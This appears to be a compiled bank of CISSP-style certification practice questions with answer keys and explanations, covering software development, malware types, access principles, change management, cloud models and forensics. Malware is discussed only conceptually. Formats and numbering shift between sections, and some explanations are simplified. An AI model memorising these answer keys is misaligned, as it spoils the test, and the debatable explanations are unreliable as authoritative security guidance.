C. Component-based development involves the use of independent and standardized modules. Each standard module consists of a functional algorithm or instruction set and is provided with interfaces to communicate with each other. Component-based development adds reusability and pluggable functionality into programs, and is widely used in modern programming to augment program coherence and substantially reduce software maintenance costs. A common example of these modules is “objects,” which are frequently used in object-oriented programming. A is incorrect because the spiral method of system development periodically revisits previous stages to update and verify design requirements. The spiral method builds upon the waterfall method. It uses discrete phases of development with an emphasis on risk analysis, prototypes, and simulations. The spiral method does not specify the development and testing of components. B is incorrect because structured programming development involves the use of logical blocks to achieve system design using procedural programming. A structured program layout minimizes the use of arbitrary transfer control statements like GOTO and emphasizes single points of entry and exit. This hierarchical approach makes it easier for the program to be understood and modified later on. D is incorrect because extreme programming is a methodology that is generally implemented in scenarios requiring rapid adaptations to changing client requirements. Extreme programming emphasizes client feedback to evaluate project outcomes and to analyze project domains that may require further attention. The coding principle of extreme programming throws out the traditional long-term planning carried out for code reuse and instead focuses on creating simple code optimized for the contemporary assignment.
1100
There are many types of viruses that hackers can use to damage systems. Which of the following is not a correct description of a polymorphic virus? A. Intercepts antivirus’s call to the operating system for file and system information B. Varies the sequence of its instructions using noise, a mutation engine, or random-number generator C. Can use different encryption schemes requiring different decryption routines D. Produces multiple, varied copies of itself
A. A tunneling virus—not a polymorphic virus—attempts to install itself under an antivirus program. When the antivirus conducts its health check on critical files, file sizes, modification dates, etc., it makes a request to the operating system to gather this information. If the virus can put itself between the antivirus and the operating system, then when the antivirus sends out a system call for this type of information, the tunneling virus can intercept the call and respond with information that indicates the system is free of virus infections. The polymorphic virus also attempts to fool antivirus scanners, but it does so by producing varied but operational copies of itself. Even if antivirus software finds and disables one or two copies, other copies may still remain active within the system. B is incorrect because a polymorphic virus can vary the sequence of its instructions by including noise, or bogus instructions, with other useful instructions. It can also use a mutation engine and a random-number generator to change the sequence of its instructions in the hopes of not being detected. The original functionality stays the same, but the code changes, making it close to impossible to identify all versions of the virus using a fixed signature. C is incorrect because a polymorphic virus can use different encryption schemes requiring different decryption routines. This requires an antivirus scan for several scan strings, one for each possible decryption method, in order to identify all copies of this type of virus. Polymorphic virus writers most commonly hide a virus’s payload with encryption and add a decryption method to the code. Once it is encrypted, the code is meaningless. However, a virus that is encrypted is not necessarily a polymorphic virus. To be polymorphic, the virus’s encryption and decryption algorithms must mutate with each new version of itself. 
D is incorrect because a polymorphic virus produces multiple, varied copies of itself in an effort to avoid detection by antivirus software. A polymorphic virus has the capability to change its own code, enabling the virus to have hundreds or thousands of variants. These activities can cause the virus scanner to not properly recognize the virus and to leave it to do its damage.
1101
Which of the following best describes the role of the Java Virtual Machine in the execution of Java applets? A. Converts the source code into bytecode and blocks the sandbox B. Converts the bytecode into machine-level code C. Operates only on specific processors within specific operating systems D. Develops the applets, which run in a user’s browser
B. Java is an object-oriented, platform-independent programming language. It is employed as a full-fledged programming language and is used to write complete programs and short programs, called applets, which run in a user’s browser. Java is platform independent because it creates intermediate code, bytecode, which is not processor-specific. The Java Virtual Machine (JVM) then converts the bytecode into machine-level code that the processor on the particular system can understand. A is incorrect because the Java Virtual Machine converts the bytecode into machine-level code. It does not convert the source code into bytecode—a Java compiler does that. The JVM also creates a virtual machine within an environment called a sandbox. This virtual machine is an enclosed environment in which the applet carries out its activities. Applets are commonly sent over HTTP within a requested web page, which means the applet executes as soon as it arrives. It can carry out malicious activity on purpose or accidentally if the developer of the applet did not do his part correctly. So the sandbox strictly limits the applet’s access to any system resources. The JVM mediates access to system resources to ensure the applet code behaves and stays within its own sandbox. C is incorrect because Java is an object-oriented, platform independent programming language. Other languages are compiled to object code for a specific operating system and processor. This is why a particular application may run on Windows but not on Macintosh. An Intel processor does not necessarily understand machine code compiled for an Alpha processor, and vice versa. Java is platform-independent because it creates intermediate code—bytecode—which is not processor-specific. D is incorrect because the Java Virtual Machine does not write applets. Java is employed as a full-fledged programming language and is used to write complete programs and short programs, called applets, which run in a user’s browser. 
A programmer creates a Java applet and runs it through a compiler. The Java compiler converts the source code into bytecode. The user then downloads the Java applet. The bytecode is converted into machine-level code by the JVM. Finally, the applet runs when called upon.
1101
An application is downloaded from the Internet to perform disk cleanup and to delete unnecessary temporary files. The application is also recording network login data and sending them to another party. This application is best described as which of the following? A. A virus B. A Trojan horse C. A worm D. A logic bomb
B. A Trojan horse looks like an innocent and helpful program, but in the background it is carrying out some type of malicious activity unknown to the user. The Trojan horse could be corrupting files, sending the user’s password to an attacker, or attacking another computer.
1102
When should security first be addressed in a project? A. During requirements development B. During integration testing C. During design specifications D. During implementation
A. The trick to this question, and any one like it, is that security should be implemented at the first possible phase of a project. Requirements are gathered and developed at the beginning of a project, which is project initiation. The other answers are steps that follow this phase, and security should be integrated right from the beginning instead of in the middle or at the end.
1102
What is the importance of inference in an expert system? A. The knowledge base contains facts, but must also be able to combine facts to derive new information and solutions. B. The inference machine is important to fight against multipart viruses. C. The knowledge base must work in units to mimic neurons in the brain. D. The access must be controlled to prevent unauthorized access.
A. The whole purpose of an expert system is to look at the data it has to work with and what the user presents to it and to come up with new or different solutions. It basically performs data-mining activities, identifies patterns and relationships the user can’t see, and provides solutions. This is the same reason you would go to a human expert. You would give her your information, and she would combine it with the information she knows and give you a solution or advice, which is not necessarily the same data you gave her.
1103
Which of the following are rows and columns within relational databases? A. Rows and tuples B. Attributes and rows C. Keys and views D. Tuples and attributes
D. In a relational database, a row is referred to as a tuple, whereas a column is referred to as an attribute.
1103
Online application systems that detect an invalid transaction should do which of the following? A. Roll back and rewrite over original data. B. Terminate all transactions until properly addressed. C. Write a report to be reviewed. D. Checkpoint each data entry.
C. This can seem like a tricky question. It is asking you if the system detected an invalid transaction, which is most likely a user error. This error should be logged so it can be reviewed. After the review, the supervisor, or whoever makes this type of decision, will decide whether or not it was a mistake and investigate it as needed. If the system had a glitch, power fluctuation, hang-up, or any other software- or hardware-related error, it would not be an invalid transaction, and in that case the system would carry out a rollback function.
1104
The software development life cycle has several phases. Which of the following lists these phases in the correct order? A. Project initiation, system design specifications, functional design analysis and planning, software development, installation/implementation, operational/maintenance, disposal B. Project initiation, functional design analysis and planning, system design specifications, software development, installation/implementation, operational/maintenance, disposal C. Project initiation, functional design analysis and planning, software development, system design specifications, installation/implementation, operational/maintenance, disposal D. Project initiation, system design specifications, functional design analysis and planning, software development, operational/maintenance
B. The following outlines the common phases of the software development life cycle:
1. Project initiation
2. Functional design analysis and planning
3. System design specifications
4. Software development
5. Testing
6. Installation/implementation
7. Operational/maintenance
8. Disposal
1104
Tim is a software developer for a financial institution. He develops middleware software code that carries out his company’s business logic functions. One of the applications he works with is written in the C programming language and seems to be taking up too much memory as it runs over a period of time. Which of the following best describes what Tim should implement to rid this software of this type of problem? A. Bounds checking B. Garbage collector C. Parameter checking D. Compiling
B. Garbage collection is an automated way for software to carry out part of its memory management tasks. A garbage collector identifies blocks of memory that were once allocated but are no longer in use and deallocates the blocks and marks them as free. It also gathers scattered blocks of free memory and combines them into larger blocks. It helps provide a more stable environment and does not waste precious memory. Some programming languages, such as Java, perform automatic garbage collection; others, such as C, require the developer to perform it manually, thus leaving opportunity for error.
1104
Marge has to choose a software development model that her team should follow. The application that her team is responsible for developing is a critical application that can have little to no errors. Which of the following best describes the type of model her team should follow? A. Cleanroom B. Joint Analysis Development (JAD) C. Rapid Application Development (RAD) D. Reuse Model
A. The software development models and their definitions are as follows:
* Joint Analysis Development (JAD): A method that uses a team approach in application development in a workshop-oriented environment.
* Rapid Application Development (RAD): A method of determining user requirements and developing systems quickly to satisfy immediate needs.
* Reuse Model: A model that approaches software development by using progressively developed models. Reusable programs are evolved by gradually modifying pre-existing prototypes to customer specifications. Since the Reuse model does not require programs to be built from scratch, it drastically reduces both development cost and time.
* Cleanroom: An approach that attempts to prevent errors or mistakes by following structured and formal methods of developing and testing. This approach is used for high-quality and critical applications that will be put through a strict certification process.
1105
__________ is a software testing technique that provides invalid, unexpected, or random data to the input interfaces of a program. A. Agile testing B. Structured testing C. Fuzzing D. EICAR
C. Fuzz testing or fuzzing is a software testing technique that provides invalid, unexpected, or random data to the input interfaces of a program. If the program fails (for example, by crashing or failing built-in code assertions), the defects can be noted.
1105
Which of the following is the second level of the Capability Maturity Model Integration? A. Repeatable B. Defined C. Managed D. Optimizing
A. The five levels of the Capability Maturity Model Integration are:
* Initial: Development process is ad hoc or even chaotic. The company does not use effective management procedures and plans. There is no assurance of consistency, and quality is unpredictable.
* Repeatable: A formal management structure, change control, and quality assurance are in place. The company can properly repeat processes throughout each project. The company does not have formal process models defined.
* Defined: Formal procedures are in place that outline and define processes carried out in each project. The organization has a way to allow for quantitative process improvement.
* Managed: The company has formal processes in place to collect and analyze quantitative data, and metrics are defined and fed into the process improvement program.
* Optimizing: The company has budgeted and integrated plans for continuous process improvement.
1106
One of the characteristics of object-oriented programming is deferred commitment. Which of the following is the best description for this characteristic? A. Autonomous objects, cooperation through exchanges of messages. B. The internal components of an object can be redefined without changing other parts of the system. C. Refining classes through inheritance. D. Object-oriented analysis, design, and modeling map to business needs and solutions.
B. The characteristics and their associated definitions are listed as follows:
* Modularity: Autonomous objects, cooperation through exchanges of messages.
* Deferred commitment: The internal components of an object can be redefined without changing other parts of the system.
* Reusability: Other programs using the same objects.
* Naturalness: Object-oriented analysis, design, and modeling map to business needs and solutions.
1106
John is reviewing database products. He needs a product that can manipulate a standard set of data for his company’s business logic needs. Which of the following should the necessary product implement? A. Relational database B. Object-relational database C. Network database D. Dynamic-static
B. An object-relational database (ORD) or object-relational database management system (ORDBMS) is a relational database with a software front end that is written in an object-oriented programming language. Different companies will have different business logic that needs to be carried out on the stored data. Allowing programmers to develop this front-end software piece allows the business logic procedures to be used by requesting applications and the data within the database.
1107
Which of the following is a field of study that focuses on ways of understanding and analyzing data in databases, with concentration on automation advancements? A. Artificial intelligence B. Knowledge discovery in databases C. Expert system development D. Artificial neural networking
B. Knowledge discovery in databases (KDD) is a field of study that works with metadata and attempts to put standards and conventions in place on the way that data are analyzed and interpreted. KDD is used to identify patterns and relationships between data. It is also called data mining.
1108
Sandy has just started as the manager of software development at a new company. There are a few things that Sandy is finding out as she interviews her new team members that may need to be approached differently. Programmers currently develop software code and upload it to a centralized server for backup purposes. The server software does not have versioning control capability, so sometimes the end software product contains outdated code elements. She has also discovered that many in-house business software packages follow the Common Object Request Broker Architecture, which does not necessarily allow for easy reuse of distributed web services available throughout the network. One of the team members has combined several open API functionalities within a business-oriented software package. Which of the following is the best technology for Sandy’s team to implement as it pertains to the previous scenario? A. Computer-aided software engineering tools B. Software configuration management C. Software development life-cycle management D. Software engineering best practices
B. Software Configuration Management (SCM) identifies the attributes of software at various points in time, and performs a methodical control of changes for the purpose of maintaining software integrity and traceability throughout the software development life cycle. It defines the need to track changes and provides the ability to verify that the final delivered software has all of the approved changes that are supposed to be included in the release.
1109
Sandy has just started as the manager of software development at a new company. There are a few things that Sandy is finding out as she interviews her new team members that may need to be approached differently. Programmers currently develop software code and upload it to a centralized server for backup purposes. The server software does not have versioning control capability, so sometimes the end software product contains outdated code elements. She has also discovered that many in-house business software packages follow the Common Object Request Broker Architecture, which does not necessarily allow for easy reuse of distributed web services available throughout the network. One of the team members has combined several open API functionalities within a business-oriented software package. Which is the best software architecture that Sandy should introduce her team to for effective business application use? A. Distributed component object architecture B. Simple Object Access Protocol architecture C. Enterprise JavaBeans architecture D. Service-oriented architecture
D. A service-oriented architecture (SOA) provides standardized access to the most needed services to many different applications at one time. This approach allows for different business applications to access the current web services available within the environment.
1110
Sandy has just started as the manager of software development at a new company. There are a few things that Sandy is finding out as she interviews her new team members that may need to be approached differently. Programmers currently develop software code and upload it to a centralized server for backup purposes. The server software does not have versioning control capability, so sometimes the end software product contains outdated code elements. She has also discovered that many in-house business software packages follow the Common Object Request Broker Architecture, which does not necessarily allow for easy reuse of distributed web services available throughout the network. One of the team members has combined several open API functionalities within a business-oriented software package. Which best describes the approach Sandy’s team member took when creating the business-oriented software package mentioned within the scenario? A. Software as a Service B. Cloud computing C. Web services D. Mashup
D. A mashup is the combination of functionality, data, and presentation capabilities of two or more sources to provide some type of new service or functionality. Open APIs and data sources are commonly aggregated and combined to provide a more useful and powerful resource.
1111
Karen wants her team to develop software that allows her company to take advantage of and use many of the web services currently available by other companies. Which of the following best describes the components that need to be in place and what their roles are? A. Web service provides the application functionality. Universal Description, Discovery, and Integration describes the web service’s specifications. The Web Services Description Language provides the mechanisms for web services to be posted and discovered. The Simple Object Access Protocol allows for the exchange of messages between a requester and provider of a web service. B. Web service provides the application functionality. The Web Services Description Language describes the web service’s specifications. Universal Description, Discovery, and Integration provides the mechanisms for web services to be posted and discovered. The Simple Object Access Protocol allows for the exchange of messages between a requester and provider of a web service. C. Web service provides the application functionality. The Web Services Description Language describes the web service’s specifications. Simple Object Access Protocol provides the mechanisms for web services to be posted and discovered. Universal Description, Discovery, and Integration allows for the exchange of messages between a requester and provider of a web service. D. Web service provides the application functionality. The Simple Object Access Protocol describes the web service’s specifications. Universal Description, Discovery, and Integration provides the mechanisms for web services to be posted and discovered. The Web Services Description Language allows for the exchange of messages between a requester and provider of a web service.
B. Web service provides the application functionality. The Web Services Description Language describes the web service’s specifications. Universal Description, Discovery, and Integration provides the mechanisms for web services to be posted and discovered. The Simple Object Access Protocol allows for the exchange of messages between a requester and provider of a web service.
1112
Which security principle involves the knowledge and possession of sensitive material as an aspect of one’s occupation? A. Principle of least privilege B. Separation of duties C. Need to know D. As-needed basis
C. The need-to-know policy operates on the basis that any given system user should be granted access only to portions of sensitive information or materials necessary to perform some task. The principle of least privilege ensures that personnel are granted only the permissions they need to perform their job and no more. Separation of duties ensures that no single person has total control over a critical function or system. There isn’t a standard principle called “as-needed basis.”
1113
An organization ensures that users are granted access to only the data they need to perform specific work tasks. What principle are they following? A. Principle of least permission B. Separation of duties (SoD) C. Need to know D. Job rotation
C. Need to know is the requirement to have access to, knowledge about, or possession of data to perform specific work tasks, but no more. The principle of least privilege includes both rights and permissions, but the term principle of least permission is not valid within IT security. Separation of duties (SoD) ensures that a single person doesn’t control all the elements of a process. A separation of duties policy ensures that no single person has total control over a critical function. A job rotation policy requires employees to rotate to different jobs periodically.
1114
What concept is used to grant users only the rights and permissions they need to complete their job responsibilities? A. Need to know B. Mandatory vacations C. Least privilege principle D. Service-level agreement (SLA)
C. An organization applies the least privilege principle to ensure employees receive only the access they need to complete their job responsibilities. Need to know refers to permissions only, whereas privileges include both rights and permissions. A mandatory vacation policy requires employees to take a vacation in one- or two-week increments. An SLA identifies performance expectations and can include monetary penalties.
1115
A large organization using a Microsoft domain wants to limit the amount of time users have elevated privileges. Which of the following security operation concepts can be used to support this goal? A. Principle of least permission B. Separation of duties C. Need to know D. Privileged account management
D. Microsoft domains include a privileged account management solution that grants administrators elevated privileges when they need them but restricts the access using a time-limited ticket. The principle of least privilege includes both rights and permissions, but the term principle of least permission is not valid within IT security. Separation of duties ensures that a single person doesn’t control all the elements of a process or a critical function. Need to know is the requirement to have access to, knowledge about, or possession of data to perform specific work tasks, but no more.
1116
An administrator is granting permissions to a database. What is the default level of access the administrator should grant to new users in the organization? A. Read B. Modify C. Full access D. No access
D. The default level of access should be no access. The principle of least privilege dictates that users should only be granted the level of access they need for their job, and the question doesn’t indicate that new users need any access to the database. Read access, modify access, and full access grant users some level of access, which violates the principle of least privilege.
1117
You want to apply the least privilege principle when creating new accounts in the software development department. Which of the following should you do? A. Create each account with only the rights and permissions needed by the employee to perform their job. B. Give each account full rights and permissions to the servers in the software development department. C. Create each account with no rights and permissions. D. Add the accounts to the local Administrators group on the new employee’s computer.
A. Each account should have only the rights and permissions needed to perform their job when following the least privilege policy. New employees would not need full rights and permissions to a server. Employees will need some rights and permissions in order to do their jobs. Regular user accounts should not be added to the Administrators group.
1118
Your organization has divided a high-level auditing function into several individual job tasks. These tasks are divided between three administrators. None of the administrators can perform all of the tasks. What does this describe? A. Job rotation B. Mandatory vacation C. Separation of duties D. Least privilege
C. Separation of duties ensures that no single entity can perform all the tasks for a job or function. A job rotation policy moves employees to different jobs periodically. A mandatory vacation policy requires employees to take vacations. A least privilege policy ensures users have only the privileges they need, and no more.
1119
A financial organization commonly has employees switch duty responsibilities every 6 months. What security principle are they employing? A. Job rotation B. Separation of duties C. Mandatory vacations D. Least privilege
A. A job rotation policy has employees rotate jobs or job responsibilities and can help detect collusion and fraud. A separation of duties policy ensures that a single person doesn’t control all elements of a specific function. Mandatory vacation policies ensure that employees take an extended time away from their jobs, requiring someone else to perform their job responsibilities, which increases the likelihood of discovering fraud. Least privilege ensures that users have only the permissions they need to perform their jobs and no more.
1120
Which of the following is one of the primary reasons an organization enforces a mandatory vacation policy? A. To rotate job responsibilities B. To detect fraud C. To increase employee productivity D. To reduce employee stress levels
B. Mandatory vacation policies help detect fraud. They require employees to take an extended time away from their jobs, requiring someone else to perform their job responsibilities, which increases the likelihood of discovering fraud. It does not rotate job responsibilities. Although mandatory vacations might help employees reduce their overall stress levels and increase productivity, these are not the primary reasons for mandatory vacation policies.
1121
Your organization has contracted with a third-party provider to host cloud-based servers. Management wants to ensure there are monetary penalties if the third party doesn’t meet their contractual responsibilities related to uptimes and downtimes. Which of the following is the best choice to meet this requirement? A. MOU B. ISA C. SLA D. SED
C. A service-level agreement (SLA) can provide monetary penalties if a third-party provider doesn’t meet its contractual requirements. Neither a memorandum of understanding (MOU) nor an interconnection security agreement (ISA) includes monetary penalties. Separation of duties is sometimes shortened to SED, but this is unrelated to third-party relationships.
1121
Which one of the following is a cloud-based service model that gives an organization the most control and requires the organization to perform all maintenance on operating systems and applications? A. Infrastructure as a service (IaaS) B. Platform as a service (PaaS) C. Software as a service (SaaS) D. Public
A. The IaaS service model provides an organization with the most control compared to the other models, and this model requires the organization to perform all maintenance on operating systems and applications. The SaaS model gives the organization the least control, and the cloud service provider (CSP) is responsible for all maintenance. The PaaS model splits control and maintenance responsibilities between the CSP and the organization.
1122
Which one of the following is a cloud-based service model that allows users to access email via a web browser? A. Infrastructure as a service (IaaS) B. Platform as a service (PaaS) C. Software as a service (SaaS) D. Public
C. The SaaS service model provides services such as email available via a web browser. IaaS provides the infrastructure (such as servers), and PaaS provides a platform (such as an operating system and application installed on a server). Public is a deployment method, not a service model.
1123
The IT department routinely uses images when deploying new systems. Of the following choices, what is a primary benefit of using images? A. Provides a baseline for configuration management B. Improves patch management response times C. Reduces vulnerabilities from unpatched systems D. Provides documentation for changes
A. When images are used to deploy systems, the systems start with a common baseline, which is important for configuration management. Images don’t necessarily improve the evaluation, approval, deployment, and audits of patches to systems within the network. Although images can include current patches to reduce their vulnerabilities, this is because the image provides a baseline. Change management provides documentation for changes.
1123
A server administrator recently modified the configuration for a server to improve performance. Unfortunately, when an automated script runs once a week, the modification causes the server to reboot. It took several hours of troubleshooting to ultimately determine the problem wasn’t with the script but instead with the modification. What could have prevented this? A. Vulnerability management B. Patch management C. Change management D. Blocking all scripts
C. An effective change management program helps prevent outages from unauthorized changes. Vulnerability management helps detect weaknesses but wouldn’t block the problems from this modification. Patch management ensures systems are kept up to date. Blocking scripts removes automation, which would increase the overall workload.
1124
Which of the following steps would be included in a change management process? (Choose three.) A. Immediately implement the change if it will improve performance. B. Request the change. C. Create a rollback plan for the change. D. Document the change.
B, C, D. Change management processes include requesting a change, creating a rollback plan for the change, and documenting the change. Changes should not be implemented immediately without evaluating the change.
1125
A new CIO learned that an organization doesn’t have a change management program. The CIO insists one be implemented immediately. Of the following choices, what is a primary goal of a change management program? A. Personnel safety B. Allowing rollback of changes C. Ensuring that changes do not reduce security D. Auditing privilege access
C. Change management aims to ensure that any change does not result in unintended outages or reduce security. Change management doesn’t affect personnel safety. A change management plan will commonly include a rollback plan, but that isn’t a specific goal of the program. Change management doesn’t perform any type of auditing.
1125
Systems within an organization are configured to receive and apply patches automatically. After receiving a patch, 55 of the systems automatically restarted and booted into a stop error. What could have prevented this problem without sacrificing security? A. Disable the setting to apply the patches automatically. B. Implement a patch management program to approve all patches. C. Ensure systems are routinely audited for patches. D. Implement a patch management program that tests patches before deploying them.
D. An effective patch management program evaluates and tests patches before deploying them and would have prevented this problem. Approving all patches would not prevent this problem because the same patch would be deployed. Systems should be audited after deploying patches, not to test for the impact of new patches.
1126
A security administrator wants to verify the existing systems are up to date with current patches. Of the following choices, what is the best method to ensure systems have the required patches? A. Patch management system B. Patch scanner C. Penetration tester D. Fuzz tester
A. A patch management system ensures that systems have required patches. In addition to deploying patches, it would also check the systems to verify they accepted the patches. There is no such thing as a patch scanner. A penetration test will attempt to exploit a vulnerability, but it can be intrusive and cause an outage, so it isn’t appropriate in this scenario. A fuzz tester sends random data to a system to check for vulnerabilities but doesn’t test for patches.
1127
A recent attack on servers within your organization caused an excessive outage. You need to check systems for known issues that attackers may use to exploit other systems in your network. Which of the following is the best choice to meet this need? A. Versioning tracker B. Vulnerability scanner C. Security audit D. Security review
B. Vulnerability scanners are used to check systems for known issues and are part of an overall vulnerability management program. Versioning is used to track software versions and is unrelated to detecting vulnerabilities. Security audits and reviews help ensure that an organization is following its policies but wouldn’t directly check systems for vulnerabilities.
1127
Which one of the following processes is most likely to list all security risks within a system? A. Configuration management B. Patch management C. Hardware inventory D. Vulnerability scan
D. A vulnerability scan will list or enumerate all security risks within a system. None of the other answers will list security risks within a system. Configuration management systems check and modify configuration settings. Patch management systems can deploy patches and verify patches are deployed, but they don’t check for all security risks. Hardware inventories only verify the hardware is still present.
1128
What describes a more agile development and support model, where developers directly support operations? A. DevOps B. Sashimi C. Spiral D. Waterfall
Correct answer and explanation: A. DevOps is a more agile development and support model, where developers directly support operations. Incorrect answers and explanations: Answers B, C, and D are incorrect. Sashimi, spiral, and waterfall are software development methodologies that do not describe a model for developers directly supporting operations.
1129
Two objects with the same name have different data. What OOP concept does this illustrate? A. Delegation B. Inheritance C. Polyinstantiation D. Polymorphism
Correct answer and explanation: C. Polyinstantiation means “many instances,” such as two objects with the same names that have different data. Incorrect answers and explanations: Answers A, B, and D are incorrect. Delegation allows objects to delegate messages to other objects. Inheritance means an object inherits capabilities from its parent class. Polymorphism allows the ability to overload operators, performing different methods depending on the context of the input message.
1130
A database contains an entry with an empty primary key. What database concept has been violated? A. Entity integrity B. Normalization C. Referential integrity D. Semantic integrity
Correct answer and explanation: A. Entity integrity means each tuple has a unique primary key that is not null. Incorrect answers and explanations: Answers B, C, and D are incorrect. Normalization seeks to make the data in a database table logically concise, organized, and consistent. Referential integrity means that every foreign key in a secondary table matches a primary key in the parent table; if this is not true, referential integrity has been broken. Semantic integrity means each attribute (column) value is consistent with the attribute data type.
1130
What type of testing determines whether software meets various end-state requirements from a user or customer, contract, or compliance perspective? A. Acceptance testing B. Integration testing C. Regression testing D. Unit testing
Correct answer and explanation: Answer A is correct; acceptance testing determines whether software meets various end-state requirements from a user or customer, contract, or compliance perspective. Incorrect answers and explanations: Answers B, C, and D are incorrect. Integration testing tests multiple software components as they are combined into a working system. Regression testing tests software after updates, modifications, or patches. Unit testing consists of low-level tests of software components, such as functions, procedures, or objects.
1130
Which vulnerability allows a third party to redirect static content within the security context of a trusted site? A. Cross-site request forgery (CSRF) B. Cross-site scripting (XSS) C. PHP remote file inclusion (RFI) D. SQL injection
Correct answer and explanation: A. Cross-site request forgery (CSRF) allows a third party to redirect static content within the security context of a trusted site. Incorrect answers and explanations: Answers B, C, and D are incorrect. XSS is a third-party execution of web scripting languages, such as JavaScript, within the security context of a trusted site. XSS is similar to CSRF; the difference is XSS uses active code. PHP RFI alters normal PHP variables to reference remote content, which can lead to execution of malicious PHP code. SQL injection manipulates a back-end SQL server via a front-end web server.
1131
1. Which of the following best describes the primary focus of the chain of custody in evidence handling? A. Documenting the location of evidence B. Taking photographs of the crime scene C. Control of evidence to maintain its integrity for court presentation D. Sealing off access to the area where a crime may have occurred
1. Answer: C. Control of evidence to maintain its integrity for court presentation Explanation: The primary focus of the chain of custody is to ensure the control and integrity of evidence so that it can be presented in court without any doubts about its authenticity.
1132
2. Which of the following is NOT a type of evidence that might be considered during a computer security investigation? A. Corroborative evidence B. Hearsay evidence C. Secondary evidence D. Predictive evidence
2. Answer: D. Predictive evidence Explanation: While corroborative, hearsay, and secondary are types of evidence mentioned, predictive evidence is not listed as a type of evidence in the context of a computer security investigation.
1133
3. What is the primary difference between a virus and a worm in terms of malware? A. A virus requires human interaction to trigger, while a worm can self-propagate. B. A virus can self-propagate, while a worm requires human interaction to trigger. C. Both virus and worm require human interaction to trigger. D. Both virus and worm can self-propagate without human interaction.
3. Answer: A. A virus requires human interaction to trigger, while a worm can self-propagate. Explanation: A virus is a type of malware that requires some form of human interaction to be activated, such as opening a file. In contrast, a worm can spread on its own by exploiting vulnerabilities in systems.
1134
4. Which of the following is a key characteristic of a Trojan horse in the context of malware? A. It can self-propagate and spread through a network. B. It looks harmless or desirable but contains malicious code. C. It changes aspects of itself, like file name or code structure, to evade detection. D. It is a piece of malware that makes minimal changes over a long period to evade detection.
4. Answer: B. It looks harmless or desirable but contains malicious code. Explanation: A Trojan horse is a type of malware that appears to be something legitimate or desirable but contains hidden malicious code. It tricks users into downloading or running it, thinking it’s safe or beneficial.
1135
5. In the context of backup strategies, what does the term “mirror backup” refer to? A. A backup that is an exact copy of a dataset without any compression B. A backup that includes only the changes since the last full backup C. A backup that includes changes since the last incremental backup D. A backup that changes its structure to evade detection
5. Answer: A. A backup that is an exact copy of a dataset without any compression Explanation: A mirror backup creates an exact replica of a dataset. It does not use compression, making it the fastest backup type in terms of both backup and restore, but it requires a significant amount of storage.
1136
6. Which of the following best describes the concept of “live evidence” in digital forensics? A. Evidence that is stored on a hard drive B. Evidence that is stored in places like RAM, cache, and buffers of a running system C. Evidence that is taken from surveillance footage from security cameras D. Evidence that is stored on backup tapes
6. Answer: B. Evidence that is stored in places like RAM, cache, and buffers of a running system Explanation: Live evidence refers to data stored in a running system’s volatile memory, such as RAM, cache, and buffers. This type of evidence can change or disappear if the system’s state is altered.
1136
8. Which of the following is NOT a step in the incident response process? A. Detection B. Encryption C. Mitigation D. Remediation
8. Answer: B. Encryption Explanation: While detection, mitigation, and remediation are steps in the incident response process, encryption is not a step in this process. Encryption is a method to secure data.
1137
7. In the context of security operations, what does the term “Service-Level Agreements (SLAs)” primarily refer to? A. Agreements that specify the minimum security standards to be maintained B. Agreements that denote time frames against the performance of specific operations C. Agreements that define the roles and responsibilities of security personnel D. Agreements that outline the backup and recovery strategies
7. Answer: B. Agreements that denote time frames against the performance of specific operations Explanation: SLAs contain terms that specify related time frames against the performance of certain operations agreed upon within the overall contract.
1138
9. What is the primary purpose of user and entity behavior analytics (UEBA)? A. To monitor network traffic and block malicious IPs B. To analyze and correlate log data from multiple sources C. To monitor the behavior and patterns of users and entities D. To provide threat intelligence and analysis of emerging threat trends
9. Answer: C. To monitor the behavior and patterns of users and entities Explanation: UEBA focuses on analyzing the behavior and patterns of users and entities, logging and correlating the underlying data, analyzing the data, and triggering alerts when necessary.
1138
10. Which of the following malware types is designed to make minimal changes over a long period to avoid detection? A. Ransomware B. Rootkit C. Data diddler D. Logic bomb
10. Answer: C. Data diddler Explanation: A data diddler is a type of malware that makes minimal changes over a prolonged period to evade detection. Its primary goal is to subtly alter data without being noticed.
1139
11. In the context of malware, which type changes aspects of itself, like file name, file size, and code structure, to evade detection every time it replicates across a network? A. Trojan B. Rootkit C. Polymorphic malware D. Logic bomb
11. Answer: C. Polymorphic malware Explanation: Polymorphic malware can change aspects of itself to evade detection every time it replicates across a network.
1140
12. Which of the following is NOT a type of evidence considered in computer security investigations? A. Oral/written statements B. Visual/audio evidence C. Digital footprints D. Hearsay evidence
12. Answer: C. Digital footprints Explanation: While oral/written statements, visual/audio evidence, and hearsay evidence are considered types of evidence in computer security investigations, “digital footprints” is not specifically mentioned as a type of evidence.
1141
13. What is the primary goal of the incident response process? A. To detect and prevent future attacks B. To provide an effective and efficient response to reduce impact to the organization C. To identify the attackers and prosecute them D. To restore all compromised systems to their original state
13. Answer: B. To provide an effective and efficient response to reduce impact to the organization Explanation: The main goals of incident response are to provide an effective and efficient response to reduce the impact on the organization, maintain or restore business continuity, and defend against future attacks.
1142
14. Which option is least likely to be employed to mitigate single points of failure? A. RAID 0 B. RAID 1 C. Utilizing an alternative Internet connection through a distinct ISP D. Employing a load-balanced server cluster
14. Answer: A. RAID 0 Explanation: Single points of failure refer to components or parts of a system that, if they fail, will cause the entire system to fail. To mitigate these vulnerabilities, redundancy is often introduced. Among the options, RAID 0 does not provide redundancy. Instead, it stripes data across multiple disks, which can improve performance but does not eliminate a single point of failure. If one disk in a RAID 0 array fails, all data is lost. On the other hand, RAID 1, having a secondary Internet connection, and using a load-balanced server cluster all introduce redundancy and help in eliminating single points of failure.
1142
15. In a black box penetration test, what level of knowledge is typically granted to the red team regarding the target infrastructure? A. The specific targets and the duration of the test B. Comprehensive details C. No information D. The enterprise’s IP subnet layout
15. Answer: C. No information Explanation: Black box penetration testing simulates an external attack where the attacker has no prior knowledge of the target system. The red team, in this context, is given no specific details about the infrastructure they are testing. This approach is designed to mimic the perspective of a real-world attacker and identify vulnerabilities that may be exploited by someone with no inside knowledge.
1142
16. Which terminology pertains to the statistical evaluation of a system or device’s operational lifespan? A. Maximum tolerable downtime (MTD) B. Statistical deviation C. Mean time to repair (MTTR) D. Mean time between failures (MTBF)
16. Answer: D. Mean time between failures (MTBF) Explanation: MTBF (mean time between failures) is a measure used to estimate the time between inherent failures of a system during its operational phase. It provides an average time span between failures and is commonly used in reliability engineering to assess the reliability of a product or system. MTTR, on the other hand, refers to the average time taken to repair a failed component. MTD is the maximum time a service or system can be down without causing significant harm to the business. Statistical deviation is a general term and does not specifically relate to the functional lifetime of a system or device.
